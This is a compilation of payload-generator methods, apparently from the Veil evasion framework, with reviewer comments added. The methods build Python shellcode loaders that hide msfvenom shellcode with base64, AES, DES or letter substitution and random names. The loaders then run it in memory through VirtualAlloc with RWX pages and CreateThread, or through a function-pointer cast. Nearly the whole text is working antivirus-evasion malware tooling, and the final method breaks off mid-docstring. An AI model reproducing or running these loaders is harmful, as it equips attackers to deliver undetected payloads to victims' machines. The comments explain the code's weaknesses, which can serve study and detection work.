    def generate(self):
        """Emit Python 2 source that base64-decodes shellcode and runs it in-process.

        The ``inject_method`` option picks one of two loader shapes:

        * ``"virtual"`` -- VirtualAlloc / RtlMoveMemory / CreateThread through
          ``ctypes.windll.kernel32`` (Windows only).
        * anything else -- ``create_string_buffer`` + ``cast(..., CFUNCTYPE(c_void_p))``;
          the heap buffer is called as a function pointer with no change to page
          protections, so it only works where that memory is executable.

        ``self.shellcode.generate()`` is not visible here; the emitted stub applies
        ``.decode("string_escape")`` after base64-decoding, so the shellcode is
        expected to be escaped text (``\\xNN`` form) rather than raw bytes.  The
        emitted source uses ``str.decode('base64', ...)`` and the ``string_escape``
        codec, both Python 2 only.  Base64 is an encoding, not encryption: the
        payload contains everything needed to recover the raw shellcode.

        Returns:
            str: generated payload source, additionally wrapped by
            ``crypters.pyherion`` when ``use_pyherion`` is ``"y"``.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)

            # Generate Random Variable Names
            ShellcodeVariableName = randomizer.randomString()
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            RandT = randomizer.randomString()

            PayloadCode = 'import ctypes\n'
            PayloadCode +=  'import base64\n'
            PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
            # base64 -> escaped text -> raw bytes (Python 2 codecs)
            PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
            # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: one RWX region,
            # which is a commonly used detection heuristic for this loader pattern
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            # NOTE(review): the allocation address and thread handle are passed through c_int
            # (32-bit); on a 64-bit interpreter they would be truncated -- this stub assumes 32-bit Python
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            # -1 == INFINITE: block until the shellcode thread exits
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            # Optional extra wrapping layer; crypters.pyherion is not visible here
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode

        else:

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            ShellcodeVariableName = randomizer.randomString()
            RandShellcode = randomizer.randomString()
            # NOTE(review): RandReverseShell is generated but never used in the emitted code
            RandReverseShell = randomizer.randomString()
            RandMemoryShell = randomizer.randomString()
            DecodedShellcode = randomizer.randomString()

            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)

            PayloadCode = 'from ctypes import *\n'
            PayloadCode += 'import base64\n'
            PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
            # str(bytearray) yields the raw bytes on Python 2; the buffer is ordinary heap memory
            PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
            # Call the buffer directly as a void function pointer (no VirtualAlloc/VirtualProtect)
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode
File: Base64.py Project: m4tux/Veil
    def generate(self):
        """Build Python 2 payload source: base64-encoded shellcode plus an in-process loader.

        ``inject_method == "virtual"`` emits the kernel32 VirtualAlloc / RtlMoveMemory /
        CreateThread sequence; any other value emits a ``create_string_buffer`` +
        ``CFUNCTYPE`` call, which executes the heap buffer as-is and therefore
        depends on that memory being executable.

        The shellcode returned by ``self.shellcode.generate()`` (defined elsewhere)
        is handled as escaped text: the emitted stub runs ``.decode("string_escape")``
        after base64-decoding.  Both codecs used by the stub (``'base64'`` and
        ``'string_escape'`` on ``str``) exist only in Python 2.  Base64 gives no
        confidentiality; the raw shellcode is fully recoverable from the payload.

        Returns:
            str: payload source, wrapped by ``crypters.pyherion`` when
            ``use_pyherion`` is ``"y"``.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)

            # Generate Random Variable Names
            ShellcodeVariableName = randomizer.randomString()
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            RandT = randomizer.randomString()

            PayloadCode = 'import ctypes\n'
            PayloadCode += 'import base64\n'
            PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
            # base64 -> escaped text -> raw bytes
            PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
            # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            # NOTE(review): pointer and handle go through 32-bit c_int -- assumes a 32-bit interpreter
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            # -1 == INFINITE
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode

        else:

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            ShellcodeVariableName = randomizer.randomString()
            RandShellcode = randomizer.randomString()
            # NOTE(review): unused in the emitted code
            RandReverseShell = randomizer.randomString()
            RandMemoryShell = randomizer.randomString()
            DecodedShellcode = randomizer.randomString()

            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)

            PayloadCode = 'from ctypes import *\n'
            PayloadCode += 'import base64\n'
            PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
            # Python 2: str(bytearray) is the raw byte string; plain heap buffer, no page-protection change
            PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode
	def generate(self):
		"""Emit a plain (unencoded) ctypes VirtualAlloc/CreateThread loader for the shellcode.

		A fresh ``shellcode.Shellcode()`` helper is created on every call and
		``self.shellcode`` is overwritten with it.  The shellcode text is inserted
		verbatim inside a single-quoted Python literal, so it must already be
		escaped ``\\xNN`` text with no unescaped quote characters; the raw bytes
		appear in the payload in that readable form.

		Returns:
			str: the payload source, wrapped by ``crypters.pyherion`` when
			``use_pyherion`` is ``"y"``.
		"""

		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()

		# Create Payload code
		PayloadCode = 'import ctypes\n'
		# Shellcode text is spliced into a '...' literal; the Python parser resolves the escapes
		PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
		# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		# NOTE(review): address and handle are wrapped in 32-bit c_int -- assumes a 32-bit interpreter
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		# -1 == INFINITE: wait for the shellcode thread
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
    def generate(self):
        """Emit an unencoded ctypes VirtualAlloc/CreateThread loader around the shellcode.

        The text returned by ``self.shellcode.generate()`` is inserted verbatim into
        a single-quoted literal in the payload, so it must be escaped ``\\xNN`` text
        containing no unescaped quotes.  Nothing obscures the shellcode: its bytes
        are readable in the generated source.

        Returns:
            str: payload source, wrapped by ``crypters.pyherion`` when
            ``use_pyherion`` is ``"y"``.
        """

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        ShellcodeVariableName = randomizer.randomString()
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()

        # Create Payload code
        PayloadCode = "import ctypes\n"
        # Escapes in the shellcode text are resolved by the Python parser at payload load time
        PayloadCode += ShellcodeVariableName + " = bytearray('" + Shellcode + "')\n"
        # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
        PayloadCode += (
            RandPtr
            + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
            + ShellcodeVariableName
            + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
        )
        PayloadCode += (
            RandBuf
            + " = (ctypes.c_char * len("
            + ShellcodeVariableName
            + ")).from_buffer("
            + ShellcodeVariableName
            + ")\n"
        )
        PayloadCode += (
            "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
            + RandPtr
            + "),"
            + RandBuf
            + ",ctypes.c_int(len("
            + ShellcodeVariableName
            + ")))\n"
        )
        # NOTE(review): the address and thread handle travel through 32-bit c_int -- assumes 32-bit Python
        PayloadCode += (
            RandHt
            + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
            + RandPtr
            + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
        )
        # -1 == INFINITE
        PayloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode
	def generate(self):
		"""Emit a loader that AES-decrypts the shellcode at run time, then injects it via ctypes.

		The key comes from ``randomizer.randomKey()`` and is written into the
		payload source itself (see the ``AES.new('...')`` line), so this is
		obfuscation against static string matching, not confidentiality: anyone
		holding the payload holds the key.  ``AES.new(secret)`` is called with a
		key only; PyCrypto defaults that to ECB mode.  Padding is removed with
		``rstrip('{')``, which presumes ``encryption.EncodeAES`` pads with ``'{'``
		(not visible here) and would also strip any genuine trailing ``0x7b``
		bytes of the plaintext.  The decrypted plaintext is still escaped text
		and is turned into bytes with the Python 2-only ``string_escape`` codec.

		Returns:
			str: payload source, wrapped by ``crypters.pyherion`` when
			``use_pyherion`` is ``"y"``.
		"""

		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		RandDecodeAES = randomizer.randomString()
		RandCipherObject = randomizer.randomString()
		RandDecodedShellcode = randomizer.randomString()
		RandShellCode = randomizer.randomString()
		RandPadding = randomizer.randomString()


		# Generate Random AES Key
		secret = randomizer.randomKey()

		# Create Cipher Object with Generated Secret Key (key-only constructor: ECB in PyCrypto)
		cipher = AES.new(secret)

		# encryption.EncodeAES is defined elsewhere; expected to return base64 text given the
		# matching b64decode in the emitted decoder below
		EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)

		# Create Payload code
		PayloadCode = 'import ctypes\n'
		PayloadCode += 'from Crypto.Cipher import AES\n'
		PayloadCode += 'import base64\n'
		# NOTE(review): os is imported into the payload but never used there
		PayloadCode += 'import os\n'
		PayloadCode += RandPadding + ' = \'{\'\n'
		# rstrip also eats real trailing '{' (0x7b) bytes, not just padding
		PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
		# The secret key is embedded in plaintext in the generated source
		PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
		PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
		PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
		# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
		# NOTE(review): address and handle pass through 32-bit c_int -- assumes a 32-bit interpreter
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		# -1 == INFINITE
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
    def generate(self):
        """Emit a loader whose shellcode text has every ``'c'`` swapped for ``'t'``.

        The escaped shellcode text is passed through ``string.maketrans("c", "t")``
        here and the payload applies the inverse table (``t`` -> ``c``) before
        decoding.  This is a single-character substitution, so it only perturbs
        static signatures; it is reversible by inspection.  It is also lossy if the
        escaped text ever contains a genuine ``'t'`` (for pure ``\\xNN`` output the
        only letters are hex digits, so none occurs -- verify the msfvenom format
        in use).  ``string.maketrans`` and the ``string_escape`` codec are Python 2
        only, in both this generator and the emitted stub.

        Returns:
            str: payload source, wrapped by ``crypters.pyherion`` when
            ``use_pyherion`` is ``"y"``.
        """

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        SubbedShellcodeVariableName = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        RandDecodedLetter = randomizer.randomString()
        RandCorrectLetter = randomizer.randomString()
        RandSubScheme = randomizer.randomString()

        # Letter Substitution Variables
        EncodeWithThis = "c"
        DecodeWithThis = "t"

        # Create Letter Substitution Scheme
        SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)

        # Escaping Shellcode (a second escaping pass: the text is embedded in a "..." literal
        # and decoded exactly once by the stub)
        Shellcode = Shellcode.encode("string_escape")

        # Create Payload File
        PayloadCode = 'import ctypes\n'
        PayloadCode += 'from string import maketrans\n'
        PayloadCode += RandDecodedLetter + ' = "t"\n'
        PayloadCode += RandCorrectLetter + ' = "c"\n'
        # Inverse table of SubScheme
        PayloadCode += RandSubScheme + ' = maketrans(' + RandDecodedLetter + ', ' + RandCorrectLetter + ')\n'
        PayloadCode += SubbedShellcodeVariableName + ' = \"' + Shellcode.translate(
            SubScheme) + '\"\n'
        PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
        # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        # NOTE(review): address and handle pass through 32-bit c_int -- assumes a 32-bit interpreter
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # -1 == INFINITE
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode
	def generate(self):
		"""Emit a loader with a one-letter substitution (``c`` <-> ``t``) over the escaped shellcode.

		A fresh ``shellcode.Shellcode()`` is created per call and stored on
		``self.shellcode``.  The escaped text is re-escaped once more (it is embedded
		in a ``"..."`` literal and decoded once by the stub), then ``'c'`` is mapped
		to ``'t'``; the stub maps ``'t'`` back to ``'c'``.  Substituting a single
		character only disturbs static signatures and is trivially reversible.
		It also corrupts any genuine ``'t'`` in the escaped text -- harmless for
		pure ``\\xNN`` output (hex digits only), so confirm the msfvenom format.
		``string.maketrans`` and ``string_escape`` are Python 2 only.

		Returns:
			str: payload source, wrapped by ``crypters.pyherion`` when
			``use_pyherion`` is ``"y"``.
		"""

		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		SubbedShellcodeVariableName = randomizer.randomString()
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		RandDecodedLetter = randomizer.randomString()
		RandCorrectLetter = randomizer.randomString()
		RandSubScheme = randomizer.randomString()

		# Letter Substitution Variables
		EncodeWithThis = "c"
		DecodeWithThis = "t"

		# Create Letter Substitution Scheme
		SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)

		# Escaping Shellcode (second escaping pass, undone once by the stub's decode)
		Shellcode = Shellcode.encode("string_escape")

		# Create Payload File
		PayloadCode = 'import ctypes\n'
		PayloadCode += 'from string import maketrans\n'
		PayloadCode += RandDecodedLetter + ' = "t"\n'
		PayloadCode += RandCorrectLetter + ' = "c"\n'
		# Inverse of SubScheme
		PayloadCode += RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n'
		PayloadCode += SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n'
		PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
		PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
		# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		# NOTE(review): address and handle pass through 32-bit c_int -- assumes a 32-bit interpreter
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		# -1 == INFINITE
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
    def generate(self):
        """Emit a loader that AES-decrypts the shellcode at run time before injecting it.

        The random key is embedded verbatim in the emitted ``AES.new('...')`` call,
        so the scheme hides the shellcode from static string matching only; it is
        not confidentiality.  ``AES.new(secret)`` passes no mode, which PyCrypto
        treats as ECB.  Unpadding is ``rstrip('{')`` -- this presumes
        ``encryption.EncodeAES`` (not visible here) pads with ``'{'`` and will also
        strip genuine trailing ``0x7b`` plaintext bytes.  The plaintext is escaped
        text and is converted with the Python 2-only ``string_escape`` codec.

        Returns:
            str: payload source, wrapped by ``crypters.pyherion`` when
            ``use_pyherion`` is ``"y"``.
        """

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        ShellcodeVariableName = randomizer.randomString()
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        RandDecodeAES = randomizer.randomString()
        RandCipherObject = randomizer.randomString()
        RandDecodedShellcode = randomizer.randomString()
        RandShellCode = randomizer.randomString()
        RandPadding = randomizer.randomString()

        # Generate Random AES Key
        secret = randomizer.randomKey()

        # Create Cipher Object with Generated Secret Key (key only -> ECB in PyCrypto)
        cipher = AES.new(secret)

        # encryption.EncodeAES is defined elsewhere; its output is base64-decoded by the stub
        EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)

        # Create Payload code
        PayloadCode = 'import ctypes\n'
        PayloadCode += 'from Crypto.Cipher import AES\n'
        PayloadCode += 'import base64\n'
        # NOTE(review): os is never used by the emitted stub
        PayloadCode += 'import os\n'
        PayloadCode += RandPadding + ' = \'{\'\n'
        # rstrip removes real trailing '{' bytes as well as padding
        PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
        # Key is written in plaintext into the payload
        PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
        PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
        PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
        # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
        # NOTE(review): address and handle pass through 32-bit c_int -- assumes a 32-bit interpreter
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # -1 == INFINITE
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode
	def generate(self):
		"""Emit a loader that DES-CFB-decrypts the shellcode at run time, then injects it.

		Both the 8-byte key and the 8-byte IV come from ``randomizer.randomKey(8)``
		and are written as literals into the payload, so this is obfuscation of
		the shellcode bytes only -- the holder of the payload holds the key.
		Single DES is also a 56-bit cipher, which matters little here given the
		key is embedded anyway.  A fresh ``shellcode.Shellcode()`` is built per
		call and stored on ``self.shellcode``.  The decrypted plaintext is the
		escaped shellcode text and is converted with the Python 2-only
		``string_escape`` codec.

		Returns:
			str: payload source, wrapped by ``crypters.pyherion`` when
			``use_pyherion`` is ``"y"``.
		"""

		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		ShellcodeVariableName = randomizer.randomString()
		RandIV = randomizer.randomString()
		RandDESKey = randomizer.randomString()
		RandDESPayload = randomizer.randomString()
		RandEncShellCodePayload = randomizer.randomString()

		# Set IV Value and DES Key (8 bytes each; both end up in the payload)
		iv = randomizer.randomKey(8)
		DESKey = randomizer.randomKey(8)

		# Create DES Object and encrypt our payload (CFB needs no block padding)
		desmain = DES.new(DESKey, DES.MODE_CFB, iv)
		EncShellCode = desmain.encrypt(Shellcode)

		# Create Payload File
		PayloadCode = 'from Crypto.Cipher import DES\n'
		PayloadCode += 'import ctypes\n'
		# IV and key are emitted as plaintext literals
		PayloadCode += RandIV + ' = \'' + iv + '\'\n'
		PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
		PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
		# Ciphertext is escaped so it can sit inside a '...' literal; the parser restores the raw bytes
		PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
		# decrypt -> escaped shellcode text -> raw bytes
		PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
		# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		# NOTE(review): address and handle pass through 32-bit c_int -- assumes a 32-bit interpreter
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		# -1 == INFINITE; no trailing newline on the final emitted line
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
    def generate(self):
        """Emit a loader that DES-CFB-decrypts the shellcode in the target process.

        The 8-byte key and IV from ``randomizer.randomKey(8)`` are both written as
